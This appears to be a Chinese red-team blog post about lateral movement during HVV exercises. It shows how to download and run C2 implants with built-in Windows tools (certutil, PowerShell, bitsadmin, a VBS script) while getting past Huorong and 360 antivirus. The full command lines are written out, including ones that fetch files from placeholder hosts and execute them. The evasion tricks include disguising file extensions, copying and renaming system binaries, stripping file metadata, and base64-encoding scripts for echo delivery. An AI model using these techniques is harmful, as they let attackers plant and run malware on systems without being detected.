背景

一年一度的HVV又要开始啦，在内网横向的时候，可能在Webshell 上传大文件、或SMBEXEC、xp_cmdshell 执行的时候，需要利用系统自带的下载命令，直接下载C2马执行。

我在这里就不说如何用DOS命令写执行文件了，（主要利用certutil 进行加密，分段写入，再利用certutil解密还原）再做下载了，遇到稍微大一些的文件，着实有点费劲。

certutil Bypass

普通下载

certutil -urlcache -split -f http://xxx/calc.exe  C:\windows\temp\updates.exe

可以看到防护项目，指出我们利用Certutil 下载了可执行文件，那么我们下载非执行文件是否就可以了呢？

certutil -urlcache -split -f http://x/calc.txt  C:\windows\temp\updates.txt  && C:\windows\temp\updates.txt

直接把下载的可执行文件，改成txt，火绒就可以Bypass了

(可见这里火绒拦截的只是下载文件的后缀格式，是否为可执行文件)

但是，当我们遇到了360，并不好使！！！ 风险内容为：certutil 木马下载工具，那是识别出我的命令？

这个最后解决挺佛系的， 首先我们要copy 一份 certutil 到任意目录 任意文件名，保持不变也没有关系

为了运行certutil时 不在system32目录下运行，

  1.首先正常执行一遍，不要带任何参数，

  2.第二遍再带参数  360就不拦截啦

Powershell download

 powershell -c "Invoke-WebRequest -uri  http://x:80/download/sv.exe -OutFile  C:\windows\tasks\x.exe"

Powerhsell 如果执行的第一条没有被绕过，那么接下来执行Whomai 也会被ban

针对360的拦截，需要把powershell 名称修改掉，由于我这里的下载网址不存在，Webrequest的操作还是执行了的（但是很多情况 对powershell 拦截的着实很严重，有更好的方法，师傅们可以加我们内部创建的群，互相交流下），powershell 可以和环境变量花式玩起来。

Bitsadmin

bb.exe /transfer n  https://www.baidu.com/img/flexible/logo/pc/result.png %LOCALAPPDATA%\Temp\1.txt

当我把详细信息的bitsadmin 删除后

我的下载就可以正常执行了，某数字AV就对我放行了。所以杀的并不是行为，只是特征！

但是在DOS下对详细信息的处理也不是很轻松，具体还是要看大家当时的环境和需求，支持个怎么样的玩法吧。

手写VBS进行下载

cscript down.vbs http://www.baidu.com/img/dong_528d34b686d4889666f77c62b9a65857.gif 1.jpg

这里要求对VBS免杀就可以了，火绒和360都是没有拦截的。

那么环境再苛刻一点，只有一个Shell会话，这13行代码如何在命令行中echo 到目标呢？

本地做好base64加密

手动去除注释信息，和换行，拼接为一行，直接echo 写入目标，再用certutil -decode 做解密即可正常使用。

这里写的还算是比较短的了，如果有更好的方法，希望师傅们可以加我们内部群共同讨论。

 在订阅号内回复EDI-VBS 进行下载

推荐文章++++

*一次bypass Xss-waf的经历

*「翻译」 如何Bypass rbash

*BC实战|后渗透之Bypass Applocker到提权